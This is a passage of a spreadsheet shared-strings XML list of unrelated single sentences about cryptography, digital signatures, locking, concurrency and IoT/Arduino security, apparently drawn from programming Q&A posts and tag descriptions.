  </si>
  <si>
    <t>The signed data cannot be changed; if it is, the signature will no longer verify as being authentic.</t>
  </si>
  <si>
    <t>String-type SQL columns are encrypted and never leave the application
server in plaintext form.</t>
  </si>
  <si>
    <t>In .net, cancellation is achieved using cancellationtokensource for signaling cancellation and a  is used by the operation to check whether cancellation was requested.</t>
  </si>
  <si>
    <t>For each of these card types, 16 bytes per sector are reserved for the keys and access conditions and can not normally be used for user data.</t>
  </si>
  <si>
    <t>The first (sand-boxed) and third () are equivalent to the applet sand-boxed and trusted modes.</t>
  </si>
  <si>
    <t>Does anyone know how I can use my captured hardware random numbers to create an RSA key within python and more specificly using PyCrypto.</t>
  </si>
  <si>
    <t>From the problems I'm seeing, it looks like an I2C controller can only carry out one operation at a time, so I would have to protect at the controller level.</t>
  </si>
  <si>
    <t>(Please note that the volatile keyword  cannot be used to achieve synchronization nor does it guarantee any memory barriers.</t>
  </si>
  <si>
    <t>And a coin slot is electrically the same as a push-button, except it only toggles when a valid coin is inserted.</t>
  </si>
  <si>
    <t>So I think at least you must change the code removing the authenticateBlock and start reading blocks of 4 bytes long.</t>
  </si>
  <si>
    <t>The CRC is calculated from the address and command bytes and used to check the integrity of the data that is received.</t>
  </si>
  <si>
    <t>For example, depending on your MySQL version, the default might still be MyISAM, which requires table locking for writing.</t>
  </si>
  <si>
    <t>A serial connection is usually configurable for byte width and possible inclusion of a parity bit.</t>
  </si>
  <si>
    <t>Also, the %hhu specifier for unsigned char may be not supported in some versions, but you can use %u, read it to an unsigned long and check if the value isn't greater than 255.</t>
  </si>
  <si>
    <t>if it's &gt; 127 when treated as an unsigned integer, because C is always set based on the unsigned interpretation of things.</t>
  </si>
  <si>
    <t>In receiver (with same SomeNumbers and ASmallNumber value), decode the number and check unixTime using receiver unixTime 
example: if (unixTime - decodedUnixTime &lt; 5 &amp;&amp; unixTime - decodedUnixTime &gt;0) then message is trusted</t>
  </si>
  <si>
    <t>In order to use system service, you might need to sign the system service with system signing key (i.e the key which used to sign the Android OS).</t>
  </si>
  <si>
    <t>You'll have to code your coinslot sensor to send to Java the information that a coin was inserted or to program in Java asking how many coins arduino read.</t>
  </si>
  <si>
    <t>If you don't want to lock your inputs, you can do the following, to run it the function in a new thread, not locking your program:</t>
  </si>
  <si>
    <t>The three are  (exclusive OR), &amp; (bitwise and), | (bitwise or)
To clear a bit
GPIO-&gt;ODR &amp;= ~pin_mask;
To set a bit
GPIO-&gt;ODR |= pin_mask;
This should give you enough information.</t>
  </si>
  <si>
    <t>It's a bit of extra work, but required for safe operation in less-than-ideal situations.</t>
  </si>
  <si>
    <t>The CryptUIWizDigitalSign function is provided by the Win32 cryptography API and allows you to digitally sign a document or BLOB.</t>
  </si>
  <si>
    <t>Concurrent modification is a common problem with some thread-using applications, when not properly using locks/syncronization.</t>
  </si>
  <si>
    <t>DocuSign Signature Appliance API for digital signatures and integration questions.</t>
  </si>
  <si>
    <t>In database terms, a FOREIGN KEY in one table points to a PRIMARY KEY in another table.</t>
  </si>
  <si>
    <t>Type of computer attack based on precomputed tables of cryptographic hashes.</t>
  </si>
  <si>
    <t>Use either of these in conjunction with the applicable tag such as [contention], [security] or [capacity] to indicate the focus of the question.</t>
  </si>
  <si>
    <t>Jasypt is a Java-based encryption library, designed for ease of use with minimum necessary knowledge of how cryptography works.</t>
  </si>
  <si>
    <t>To protect the license file from any manipulation, license file will be signed using a digital signatures.</t>
  </si>
  <si>
    <t>For example, customer account numbers may be restricted within the values 10000 to 20000, if this is the arbitrary range of the numbers used for the system.</t>
  </si>
  <si>
    <t xml:space="preserve"> is the Java implementation of OpenBSD's Blowfish password hashing code, as described in "A Future-Adaptable Password Scheme" by Niels Provos and David Mazires.</t>
  </si>
  <si>
    <t>Wiki:
Encoding of a file is achieved by converting information into another form of representation.</t>
  </si>
  <si>
    <t>Each symbol has a codepoint (a number), and these codepoints can be encoded (converted to a sequence of bytes) using a variety of encodings.</t>
  </si>
  <si>
    <t>CryptSharp provides a number of password crypt algorithms - BCrypt, LDAP, MD5 (and Apache's htpasswd variant), PHPass (WordPress, phpBB, Drupal), SHA256, SHA512, and Traditional and Extended DES.</t>
  </si>
  <si>
    <t>Use either of these in conjunction with the applicable tag such as contention, security or capacity to indicate the focus of the question.</t>
  </si>
  <si>
    <t>A Padding Oracle Attack exploits ciphertext decryptor which distinguishes between wrong padding and failed decryption (oracle).</t>
  </si>
  <si>
    <t>The output of the encryption function is the tuple {K,C,T}, where K is the encrypted common secret, C is the ciphertext, and T is the authentication tag.</t>
  </si>
  <si>
    <t>MAC are sometimes called signatures, while other authors reserve the word signature for asymmetric cryptography.</t>
  </si>
  <si>
    <t>However, the lock must be released the same number of times or else other threads will be unable to acquire the lock.</t>
  </si>
  <si>
    <t>Enveloping XML signature is when the data to be signed resides or is referenced inside the signature element itself.</t>
  </si>
  <si>
    <t>In many contexts, the word encryption also implicitly refers to the reverse process, decryption (e.g.</t>
  </si>
  <si>
    <t>I was able to get a desired behavior by changing the  XBee MR parameter (Mesh unicast retries - The maximum number of network packet delivery attempts) to the maximum (0x7), none of my packages are lost, even for a delay of 0s (zero) between the transmission of each package.</t>
  </si>
  <si>
    <t>There are many kinds of valves dealing with different aspects of the server's operation and functionality, some of which include:
Logging
Authentication
SSL
Single Sign On
stuck thread detection
For more information, visit the Apache Tomcat documentation</t>
  </si>
  <si>
    <t>Stunnel uses the OpenSSL library for cryptography, so it supports whatever cryptographic algorithms are compiled into the library.</t>
  </si>
  <si>
    <t>When a human signs an XML document (as opposed to a machine), it is required that the data to be signed be first transformed using  (see the above example).</t>
  </si>
  <si>
    <t>The anti-spoofing property ConnectionDeviceGenerationId does not seem to be used for this since:
generationId - An IoT hub-generated, case-sensitive string up to 128 characters long.</t>
  </si>
  <si>
    <t>The signed JAR file contains, among other things, a copy of the certificate from the keystore for the public key corresponding to the private key used to sign the file.</t>
  </si>
  <si>
    <t>However, it has been shown that MD5 is not collision resistant; as such, MD5 is not suitable for applications like SSL certificates or digital signatures that rely on this property.</t>
  </si>
  <si>
    <t>A wallet class with encryption, fee calculation, pluggable coin
selection/coin control policies, extensions support and event
listeners that let you stay up to date with changes in your balance.</t>
  </si>
  <si>
    <t>A spinlock is a lock which causes a thread trying to acquire it to simply wait in a loop ("spin") while repeatedly checking if the lock is available.</t>
  </si>
  <si>
    <t>SQLite is ACID-compliant and implements most of the SQL standard, using a dynamically and weakly typed SQL syntax that does not guarantee the domain integrity.</t>
  </si>
  <si>
    <t>Metadata management: Work across the entire spectrum of use cases, from manually generating a fixed, corporate taxonomy to enforcing SEO policies for increasing online traffic, to dynamically generating taxonomy and automating the tagging of content.</t>
  </si>
  <si>
    <t>Here is the entire code so far:
Finally, if I wanted to make the user get locked out after 3 incorrect tries after the initial lockout, and set that delay to a certain amount of time, how would I go about doing that?</t>
  </si>
  <si>
    <t>If you're finding yourself unable to ssh into a Pi, the standard culprits are signal strength (due to distance or obstacles) and interference from other traffic on the channel.</t>
  </si>
  <si>
    <t>It is a small Forth-like stack-oriented language, with syntax designed to make the code inherently obfuscated, confusing, and unreadable.</t>
  </si>
  <si>
    <t>The identifier string is unique across all apps which may use the platform and is typically a long, random, string (a "GUID").</t>
  </si>
  <si>
    <t>In cryptography, a public key certificate (also known as a digital certificate or identity certificate) is an electronic document which uses a digital signature to bind a public key with an identity  information such as the name of a person or an organization, their address, and so forth.</t>
  </si>
  <si>
    <t>Just Discord API interaction
Not using slow endpoints, for example, getting a large list of messages in a channel
Less than 5000 guilds
You should be able to run on any of the Pis
More than 5000 guilds
If you have a large number of active users, then you should go for a 3 B+ to be safe.</t>
  </si>
  <si>
    <t>A strong name consists of the assembly's identityits simple text name, version number, and culture information (if provided)plus a public key and a digital signature.</t>
  </si>
  <si>
    <t>Because the algorithm is known, it is no longer a trade secret.</t>
  </si>
  <si>
    <t>I also tried the reverse approach of continuously scanning my lan, but other that seeming stupid it doesn't work and it's not scalable, iPhone goes in low power mode when it's locked and it just sends beacons, aka is not pingable, reachable.</t>
  </si>
  <si>
    <t>I've logged a length count of my data being transferred:
Without AES encryption, data length was 197 bytes which outputted fine on the Arduino serial console.</t>
  </si>
  <si>
    <t>The association is set up by means of a digital signature which can be validated by recipients.</t>
  </si>
  <si>
    <t>If that's not the case, you would need to export a p7b file containing the public portion of the entire chain and supply the public certificate collection (representing the trust chain) to the SecurityProviderX509Certificate second parameter.</t>
  </si>
  <si>
    <t>I have a gateway which catches LoRa packets(decrypted with AES-128 and encoded as base64) and converts them to UDP.</t>
  </si>
  <si>
    <t>Per RFC3280, the maximum length of the Common Name for an SSL certificate is 64 chars.</t>
  </si>
  <si>
    <t>This algorithm is nowadays considered insecure due to its limited keyspace and high speed, which allow an attacker using modern computers to test all possible passwords by brute force in a relatively short time.</t>
  </si>
  <si>
    <t>Preliminary results indicate it is producing results suitable for cryptographic purposes.</t>
  </si>
  <si>
    <t>Consequently, writing invalid access conditions to the sector trailer renders the whole sector unusable.</t>
  </si>
  <si>
    <t>A part of the IP address identifying the whole local network (high bits as defined by netmask).</t>
  </si>
  <si>
    <t>DDP can run over Websockets or AJAX long polling, and supports transparent reconnection.</t>
  </si>
  <si>
    <t>The Shoreline Firewall, more commonly known as Shorewall, is high-level tool for configuring Netfilter.</t>
  </si>
  <si>
    <t>SIV (Synthetic Initialization Vector) is a block cipher mode for authenticated-encryption in which the initialization vector can be calculated deterministically.</t>
  </si>
  <si>
    <t>I need to authenticate all the messages from my website to the Arduino, so I have found that the less time expensive way is using XTEA cryptography.</t>
  </si>
  <si>
    <t>What's the best way of effortlessly achieving a high level of security for outside-firewall communications on an ESP8266?</t>
  </si>
  <si>
    <t>National Institute of Standards and
Technology (NIST) have  BiomDI, opensource tools for fingerprint operations in C:
http://www.nist.gov/itl/iad/ig/biomdi.cfm
There's a mirror on github:
https://github.com/tarzan0820/BIOMDI</t>
  </si>
  <si>
    <t>FourCC (literally, four-character code) is a sequence of four bytes used to uniquely identify data formats.</t>
  </si>
  <si>
    <t>Database-level encryption allows securing the data as it is inserted to, or
retrieved from the database.</t>
  </si>
  <si>
    <t>The W3C XML Encryption standard specifies a process for encrypting data and representing the result in XML.</t>
  </si>
  <si>
    <t>On standard benchmarks, Warp transactions introduce just 1.8% overhead compared to the same workload without transactional guarantees.</t>
  </si>
  <si>
    <t>Objects encoded elsewhere in the hierarchy, whether higher than, lower than, or parallel to this particular object, are not accessible.</t>
  </si>
  <si>
    <t>Since dates are represented in elasticsearch internally as long values, it is possible to use the normal histogram on dates as well, though accuracy will be compromised.</t>
  </si>
  <si>
    <t>Here's what it looks like with WPA2 enabled (looks like you've already got this part figured out and working though):
interface=wlan0
driver=&lt;insert driver here&gt;
ssid=&lt;insert SSID here&gt;
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=&lt;insert passphrase here&gt;
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP
Hope some of this information can be of use... happy hacking!</t>
  </si>
  <si>
    <t>The problem at first seemed to be that the serial output was spewing random letters/numbers when it was supposed to be spouting common passwords.</t>
  </si>
  <si>
    <t>I want the pairing to be secured(meaing there should be some kind of authentication i can set like PIN(4 digits) or Passkey(6 digits)) without the user logged into it.</t>
  </si>
  <si>
    <t>In order to prevent a MITM attack where the response is faked to open the lock, I want to use some kind of encrypted response.</t>
  </si>
  <si>
    <t>My encryption works so far if I intialiaze the IV like this on both sides:
ESP32:
Django:
The library of the ESP32 has an encryption function which expects an unsigned char array.</t>
  </si>
  <si>
    <t>PHPseclib's documentation is a bit lacking, and it doesn't detail the behaviour of the Crypt_RSA::encrypt() function on failure.</t>
  </si>
  <si>
    <t>I used a stepper motor, but there are tons of choices - door locks, servomotors, dc motors.....
how are you detecting if it is open or closed?</t>
  </si>
  <si>
    <t>So , as 24 * 3600 == 86400, you invoke undefined behaviour for the signed int and wrap for the unsigned (the int will likely wrap, too, but that is not guaranteed).</t>
  </si>
  <si>
    <t>I would suggest digging into the ins and outs of networking since there are many options and you will need to be aware of the security implications with opening up your ports to the world.</t>
  </si>
  <si>
    <t>And there is a limitation of retrieving connectionState because the Maximum number of device identities returned in a single call is 1000.</t>
  </si>
  <si>
    <t>Note, connect is a blocking call and you will need to perform all this work in a worker thread to prevent locking up your UI.</t>
  </si>
  <si>
    <t>After just a few button presses, the internal state of the pseudorandom number generator would basically be unpredictable.</t>
  </si>
  <si>
    <t>When you encrypt end-to-end you're no longer dependent on the underlying transport layer's security.</t>
  </si>
  <si>
    <t>You can use MD5, it is the Android phone that have to send the MD5 hash, that is, 16 bytes, so the Arduino must only check if that MD5 hash exists in the list of users there, for example.</t>
  </si>
  <si>
    <t>A SQL Server table hint that can be used to prevent queries from issuing shared read locks.</t>
  </si>
  <si>
    <t>The SignTool tool is a command-line tool that digitally signs files, verifies signatures in files, or time stamps files.</t>
  </si>
  <si>
    <t>CHECK constraints enforce domain integrity by limiting the values that are accepted by one or more columns.</t>
  </si>
  <si>
    <t>Connections to a single HTTP 1.1 server are limited to two simultaneous connections, named the two-connection limit.</t>
  </si>
  <si>
    <t>Apart from online authentication many EICs also give users the option to sign electronic documents with a digital signature.</t>
  </si>
  <si>
    <t>Node.js crypto module provides cryptographic functionality that includes a set of wrappers for OpenSSL's hash, HMAC, cipher, decipher, sign and  verify functions.</t>
  </si>
  <si>
    <t>Blowfish is a block cipher designed in 1993 to be fast on the general purpose CPUs of the time.</t>
  </si>
  <si>
    <t>A Trusted Platform Module (TPM) is a secure coprocessor found in some PC-type computers that provides cryptographic operations and system integrity measurements.</t>
  </si>
  <si>
    <t>Digital watermarks may be used to verify the authenticity or integrity of the carrier signal or to show the identity of its owners.</t>
  </si>
  <si>
    <t>Almost all of these systems use some kind of beacons as reference points and calculate the mobile device position using a multilateration algorithm or a fingerprint one.</t>
  </si>
  <si>
    <t>Any
  concurrent queries, including those running with READUNCOMMITTED or
  NOLOCK hints, are blocked when attempting to acquire a Sch-S lock.</t>
  </si>
  <si>
    <t>Use in conjunction with the applicable tag such as file-access, memory or locking to indicate the kind of resource being referred to.</t>
  </si>
  <si>
    <t>This allows callbacks to be added for hashing and encryption on write and decryption and verification on read.</t>
  </si>
  <si>
    <t>Bcrypt-ruby gem is a sophisticated and secure hash algorithm designed by The OpenBSD project for hashing passwords.</t>
  </si>
  <si>
    <t>SQL CHECK constraints enforce domain integrity by limiting the values that are accepted by one or more columns.</t>
  </si>
  <si>
    <t>Locks are most commonly used with database transactions, where a lock is requested and granted before any data is updated.</t>
  </si>
  <si>
    <t>Helpful links
MySQL manual on locking
Details on how Oracle database row locking works
MyISAM versus InnoDB</t>
  </si>
  <si>
    <t>Both the Caesar cipher and the Vigenre cipher only perform substitution; simple transposition cipher's such as the Rail Fence cipher also fall in this category.</t>
  </si>
  <si>
    <t>This lets you store your secret material (such as keys or passwords) in the same repository as your code, without requiring you to lock down your entire repository.</t>
  </si>
  <si>
    <t>Therefore the overall aim of multi-threading is to minimize the amount of serial execution (exclusive locking) within any concurrent system.</t>
  </si>
  <si>
    <t>In addition, it is often necessary to capture other resource demands like I/O or "logical" resources like locks/mutexes/semaphores.</t>
  </si>
  <si>
    <t>Algorithms
  include Hidden Markov Models, Maximum
  Entropy Markov Models, and Conditional
  Random Fields.</t>
  </si>
  <si>
    <t>A private key is used to sign the message and a public key is used to verify the integrity and authenticity of a message.</t>
  </si>
  <si>
    <t>In SMP situations a CPU cache level may be private to a single CPU, a cluster of CPUs or the whole system.</t>
  </si>
  <si>
    <t>The library is explicitly made thread-aware (in that there's no global state) but not thread-safe.</t>
  </si>
  <si>
    <t>A cryptographic toolkit is often used along with a public-private key pair to digitally sign a message and to verify a message.</t>
  </si>
  <si>
    <t>PKCS11 is a Public Key Cryptography Standard for performing cryptographic operations using Hardware Security Modules (HSM) and smart cards</t>
  </si>
  <si>
    <t>The result of encrypting data is an XML Encryption  element which contains (via one of its children's content) or identifies (via a URI reference) the cipher data.</t>
  </si>
  <si>
    <t>[2]
It is typically used to reduce locking overhead when implementing "lazy initialization" in a multi-threaded environment, especially as part of the Singleton pattern.</t>
  </si>
  <si>
    <t>in your code for the application you have this:
which is fine, when an application connects the format of the id is a:orgId:uniqueIdentifierForTheApplication
uniqueIdentifierForTheApplication can be any string (within the allowed character set), and does not need to be pre-registered, so generating a random number here works in 99% of cases.</t>
  </si>
  <si>
    <t>W3C standard for achieving Digital Rights Management (DRM) for audio and video content in the browser through a JavaScript API and proprietary Content Decryption Modules (CDM).</t>
  </si>
  <si>
    <t>iwconfig -  manipulate the basic wireless parameters
iwlist - allow to initiate scanning and list frequencies, bit-rates, encryption keys...
iwspy - allow to get per node link quality
iwpriv - allow to manipulate the Wireless Extensions specific to a driver (private)
ifrename - allow to name interfaces based on various static criteria</t>
  </si>
  <si>
    <t>I realise that this seems very long winded when all you want to do is send half a dozen bytes to control an arm but comms of this nature is intrinsically vulnerable, so the only way to get it operating reliably will be to implement some sort of protocol.</t>
  </si>
  <si>
    <t>PKCS#12, that is Public-Key Cryptography Standard number 12, allows all the identity informations to be encrypted in a single cummulative carrier to be utilized and exchanged.</t>
  </si>
  <si>
    <t>I'm having issues successfully posting data to the API - here's my code:
[rPi Python code]
This gives me an error of:
{"error":{"text":SQLSTATE[23000]: Integrity constraint violation: 1048 Column 'item' cannot be null}}
Notes:
I've also tried to update my DB to allow NULL values - this results in only null values being inserted - ie/ it seems that my python code isn't posting data.......
Any ideas on how I can resolve this?</t>
  </si>
  <si>
    <t>The worst what could happen is that some attacker will either block the client from getting the trigger messages or that the attacker fakes trigger messages even though there is no actual command waiting from the server.</t>
  </si>
  <si>
    <t>PKCS #11 is one of the Public-Key Cryptography Standards (PKCS) published by RSA Laboratories that defines a platform-independent API for using cryptographic tokens such as Hardware Security Modules (HSM) and smart cards.</t>
  </si>
  <si>
    <t>How Can I obtain the result of this encrypting operation?</t>
  </si>
  <si>
    <t>To run threads repeatedly, you will need to reinitialize the Thread object after each run.</t>
  </si>
  <si>
    <t>If you see this result code, you can generally attempt the action again - typically the NEXT render cycle (so in the mean time the lock can be cleared), or you can delegate that call to another thread in your app.</t>
  </si>
  <si>
    <t>The serial is processed one char per cycle to prevent blocking.</t>
  </si>
  <si>
    <t>A self-signed certificate is usually signed by an own, custom generated private key.</t>
  </si>
  <si>
    <t>More info about the Mac security change can found here http://lapcatsoftware.com/articles/app-translocation.html
extract from the link
I was looking through the misnamed "What's New in OS X" document, and something caught my eye under "Security and Privacy Enhancements":
Starting in OS X v10.12, you can no longer provide external code or
  data alongside your code-signed app in a zip archive or unsigned disk
  image.</t>
  </si>
  <si>
    <t>The ADK will be the USB host in accessory mode, so (without extreme levels of hacking) the ADK cannot be connected to the development PC running the AVD
Will the DDMS / debugger work on a device that's hooked to an ADK?</t>
  </si>
  <si>
    <t>the upper nibble of the first byte set to 0xF, length between 5 and 16 bytes) indicating a proprietary, unregistered AID, otherwise you might collide with other standard applications.</t>
  </si>
  <si>
    <t>The only safety that C++03 provides is that an integer or a value of one enum type does not convert implicitly to another enum type.</t>
  </si>
  <si>
    <t>Trace API calls and general behavior of the file and distill this into high level information and signatures comprehensible by anyone.</t>
  </si>
  <si>
    <t>An unsigned assembly can expose the internal members to another unsigned assembly with (C# and VB.NET):
For a signed assembly to expose the internal members to another signed assembly, the following can be used (C# and VB.NET):</t>
  </si>
  <si>
    <t>For example, one could build the table with indexes to support efficient searching for specific values or with triggers to perform additional actions or validation when certain events occur, such as inserting a row into the table.</t>
  </si>
  <si>
    <t>When I try, however, to connect in 'X.509 CA-Signed' mode, I fail with 'Connection Not Accepted: 0x5: Not Authorized' (in the latter case, I registered the device on IoT Hub as 'X.509 CA-Signed').</t>
  </si>
  <si>
    <t>If that's the case, does it mean that each entry in the L2 cache will be invalidated when that memory location in SDRAM becomes a subject of a change?</t>
  </si>
  <si>
    <t>In this case, either your phone line does not have caller id enabled (this can be tested with a hardware caller id device), or the modem does not support caller id.</t>
  </si>
  <si>
    <t>It creates a light box with a countdown and options to stay signed in or sign out.</t>
  </si>
  <si>
    <t>Most legal Unicode characters are allowed in these strings, which are interpreted in a case-insensitive manner.</t>
  </si>
  <si>
    <t>For this to work it must be computationally easy for a user to generate a public and private key-pair to be used for encryption and decryption.</t>
  </si>
  <si>
    <t>By the time my code is run, the CPU is already in Normal Mode, so I can't have access to the Secure world / Trustzone area.</t>
  </si>
  <si>
    <t>I will now need to look into breaking up packets into 20 bytes maximum to ensure no data corruption.</t>
  </si>
  <si>
    <t>If you're worried that the voltage could increase above 5V, you can protect your arduino with a simple voltage divider using two resistors.</t>
  </si>
  <si>
    <t>Your symmetric keys must have a key length between 16 bytes and 64 bytes in the valid Base64 format.</t>
  </si>
  <si>
    <t>You might however need root-level access on the honeycomb tablet if you want to do low-level (especially write) access to this system peripheral.</t>
  </si>
  <si>
    <t>Shell: The `flock` utility manages locks in scripts; C programming: flock() applies or removes an advisory lock on an open file.</t>
  </si>
  <si>
    <t>An Android apk is just a zip file, so to see the difference between a signed and unsigned apk built from Eclipse, you just need to unzip the files and compare the contents.</t>
  </si>
  <si>
    <t>While this is in theory possible, but I don't know of any manufacturers that support this with off-the-shelf beacons for a few reasons:
Some manufacturers limit the configurability of beacons over a bluetooth interface to only a short-time interval after you put them in configuration mode (by power-on, double clicking a button, etc,) as @Paulw11 mentions.</t>
  </si>
  <si>
    <t>Code at the Device simulator:
In Azure function - If I convert 
Here I have tried different types of encoding to covert myIoTHubMessage to byte array, but it did not worked.</t>
  </si>
  <si>
    <t>The key pairs and certificates are all generated in this line in a
  regulatory environment which allows auditing and a high level of
  encryption.</t>
  </si>
  <si>
    <t>Kiosk mode is a software mode for locking down the environment to block other applications from being launched and prevent misuse by end-users.</t>
  </si>
  <si>
    <t>A hash function is any algorithm which computes a fixed length data result from a block of variable length datacalled the key.</t>
  </si>
  <si>
    <t>On the hardware level, it only checks data integrity based on start and stop bits, and will miss out any errors in between.</t>
  </si>
  <si>
    <t>"; }'\';
xterm -e "$cmd" &amp;
Apparently perl signal handling is fairly complicated because perl has to defer them until it's not in the middle of something that doesn't do proper locking.</t>
  </si>
  <si>
    <t>The package manifest is digitally signed as part of signing the app package.</t>
  </si>
  <si>
    <t>The Encrypting File System (EFS) on Microsoft Windows is a feature introduced in version 3.0 of NTFS that provides filesystem-level encryption.</t>
  </si>
  <si>
    <t>There is a slight penalty for key generation to obtain a secure random number from the operating system; /dev/urandom under Linux costs about 6000 cycles.</t>
  </si>
  <si>
    <t>A verified phone number is also returned for convenience, but the users number may change at any time and should not be used for authentication.</t>
  </si>
  <si>
    <t xml:space="preserve"> is a thread-safe class that defines an immutable object that represents a container.</t>
  </si>
  <si>
    <t>if you want to trap the distance you could do this process to validate your sensor has no problem (i suppose wiring is right):
In order to generate the ultrasound you need to set the Trig on a High State for 10 s. That will send out an 8 cycle sonic burst which will travel at the speed sound and it will be received in the Echo pin.</t>
  </si>
  <si>
    <t>According to Evan's answer in this page, in order to change the authentication key of a sector we need to overwrite the key in the 4th block (final block) of that sector.</t>
  </si>
  <si>
    <t>I'm trying to implement what will actually be a non-internet connected device that users would sign into at a remote location to show they had arrived, kind of like a geocache but using wifi sign in.</t>
  </si>
  <si>
    <t>When the Arduino sends its GET request, it also sends a randomly selected index, indicating to the server which value to use to encrypt the open/lock command.</t>
  </si>
  <si>
    <t>(I've tried with intent filter and broadcast receiver but its not working(system always get first priority then my receiver))
Is there any way to create secure comm Channel without pairing it ?</t>
  </si>
  <si>
    <t>well, I googled a little bit more and found that the most common solution, when chips are identical, but have different suffixes (like attiny2313 and attiny2313a) is to use -F key for overriding the signature check.</t>
  </si>
  <si>
    <t>Serial port communication offers the option to transmit a parity bit along with each byte.</t>
  </si>
  <si>
    <t>It seems that at least some kind of garbage is interpreted as a command to set the card password, thus locking the card.</t>
  </si>
  <si>
    <t>You won't be able to process the input signal, since the signal could be HDCP encrypted, and even though the master key was found, it's still illegal to decrypt unless you have a license.</t>
  </si>
  <si>
    <t>Let me quote:
Memory is leaking (some 24 bytes, depending on hostName size) every
  time I use ESP8266HTTPClient to GET data from a secure site.</t>
  </si>
  <si>
    <t>The library is explicitly made thread-aware (in that there's no global
  state) but not thread-safe.</t>
  </si>
  <si>
    <t>To do that it has to lock out interrupts in "critical sections", which is a very expensive operation and can lead to missed interrupts.</t>
  </si>
  <si>
    <t>CoSign is a family of software and hardware for digitally signing documents of many different formats, including PDF, Microsoft Word, XML, tiff, Microsoft Excel and others.</t>
  </si>
  <si>
    <t>Parameters or variables in a program are considered as hard-coded, if they represent a constant value that can't be changed by configuration or via any kind of interface.</t>
  </si>
  <si>
    <t>The Perl "secret operators" are character sequences discovered (or created) by Perl obfuscators and golfers, usually when looking for a shorter way to perform a given operation.</t>
  </si>
  <si>
    <t>Pessimistic locking is a strategy that will lock a database record, that is to be updated, for exclusive use until the update is complete.</t>
  </si>
  <si>
    <t>`pip install cryptography` is a command for installing `cryptography`, a Python library which exposes cryptographic recipes and primitives.</t>
  </si>
  <si>
    <t>The six basic security concepts that need to be covered by security testing are: confidentiality, integrity, authentication, availability, authorization and non-repudiation.</t>
  </si>
  <si>
    <t>An HTTP Signature is a way to sign HTTP messages in order to securely check integrity.</t>
  </si>
  <si>
    <t>Publishers can digitally sign collections and consumers can verify integrity and origin of content.</t>
  </si>
  <si>
    <t>SD-card (Secure Digital) is a non-volatile memory card, often used in digital cameras as well as in mobile devices.</t>
  </si>
  <si>
    <t>SHA-2 is a set of cryptographic hash functions (SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224, SHA-512/256) published in 2001 by the NIST as a U.S. Federal Information Processing Standard (FIPS).</t>
  </si>
  <si>
    <t>Despite its name, the crypt(3) function cannot actually be used to encrypt data; the transformation it implements is deliberately non-reversible, so that its output cannot be decrypted to recover the original password.</t>
  </si>
  <si>
    <t>Row Identity / Row Identification in SQL is the unique identity of the currently served row.</t>
  </si>
  <si>
    <t>A digital signature is a string of bits that is computed from some data (the data being "signed") and the private key of an entity (a person, company, etc.).</t>
  </si>
  <si>
    <t>The Perl "secret operators" have been discovered (or created) by Perl obfuscators and golfers, usually when looking for a shorter way to perform a given operation.</t>
  </si>
  <si>
    <t>The OpenSSL extension for PHP uses the functions of openssl (OpenSSL) for generation and verification of signatures and for doing full encryption and decryption of data.</t>
  </si>
  <si>
    <t>The database record is locked immediately when the lock is requested and it is then guaranteed that the database record will be updated.</t>
  </si>
  <si>
    <t>(This performance measurement is for short messages; for very long messages, verification time is dominated by hashing time.)</t>
  </si>
  <si>
    <t>By using Key Vault, you can encrypt keys and secrets (such as authentication keys, storage account keys, data encryption keys, .PFX files, and passwords) by using keys that are protected by hardware security modules (HSMs).</t>
  </si>
  <si>
    <t>Randomized encryption is more secure, but prevents searching, grouping, indexing, and joining on encrypted columns.</t>
  </si>
  <si>
    <t>The tag guarantees the authenticity of the message: only a party that has the secret key can compute a valid tag.</t>
  </si>
  <si>
    <t>For questions specifically about cryptographically secure uses of hash functions, use hash combined with the cryptography tag.</t>
  </si>
  <si>
    <t>The term single sign-on covers a wide range of mechanisms for sharing user authentication credentials and rights between different systems.</t>
  </si>
  <si>
    <t>Enveloped XML signature is when the the signature element resides within the root element of the document which contains or refers to the data to be signed.</t>
  </si>
  <si>
    <t>It supports mouse events, modified special keys, and supports both blocking and non-blocking modes of operation.</t>
  </si>
  <si>
    <t>The Session Initiation Protocol, defined in RFC 3261, is an application layer signalling protocol for establishing and modifying long-running relationships between two or more peers.</t>
  </si>
  <si>
    <t>Long polling is itself not a true push; long polling is a variation of the traditional polling technique, but it allows emulating a push mechanism under circumstances where a real push is not possible, such as sites with security policies that require rejection of incoming HTTP/S Requests.</t>
  </si>
  <si>
    <t>This is the most difficult solution of the three as you need two separate threads (or a thread and an ISR) and protect ring buffer from concurrent access, but also the most powerful and flexible.</t>
  </si>
  <si>
    <t>eToken is portable USB device that can be used to generate and provide secure storage for passwords, digital certificates, secure authentication, digital signing and encryption.</t>
  </si>
  <si>
    <t>Jasypt (Java simplified encryption) is a java library which allows the developer to add basic encryption capabilities to his/her projects with minimum effort, and without the need of having deep knowledge on how cryptography works.</t>
  </si>
  <si>
    <t>Is it possible to hash/encrypt and use the result for authentication?</t>
  </si>
  <si>
    <t>lookup audio fingerprinting ... essentially you probe the frequency domain output from the FFT call and take a snapshot of the range of frequencies together with the magnitude of each freq then compare this between known animal signal and unknown signal and output a measurement of those differences.</t>
  </si>
  <si>
    <t>The C++ standard does not specify if the  type is signed or unsigned.</t>
  </si>
  <si>
    <t>Mersenne Twister(MT) is a pseudorandom number generating algorithm developed by Makoto Matsumoto and Takuji Nishimura in 1996/1997.</t>
  </si>
  <si>
    <t>To work around this problem, generated license file can be tied to individual's machine by following matters:
Tie the generated license to individual's machine using machine unique identifier such as computer SID, HDD serial number, CPU Identifier, etc.</t>
  </si>
  <si>
    <t>In this case, it will send the index of the code it used to encrypt the data and the encrypted data.</t>
  </si>
  <si>
    <t>Very large numbers often occur in fields such as mathematics, cosmology, cryptography and statistical mechanics.</t>
  </si>
  <si>
    <t>A Padding Oracle Attack exploits ciphertext decryptor to recover the plaintext by sending multiple manipulated ciphertexts.</t>
  </si>
  <si>
    <t>Dictionaries in the language are used to contain key-value pairs like dictionaries in Python or hashes in Perl.</t>
  </si>
  <si>
    <t>Signatures are generated deterministically; key generation consumes new randomness but new signatures do not.</t>
  </si>
  <si>
    <t>Mt.exe generates hashes using the CryptoAPI implementation of the Secure Hash Algorithm (SHA-1).</t>
  </si>
  <si>
    <t>I am using the dynamically allocated IP address that the 3g service provider has allocated to the Pi to try and log in to it.</t>
  </si>
  <si>
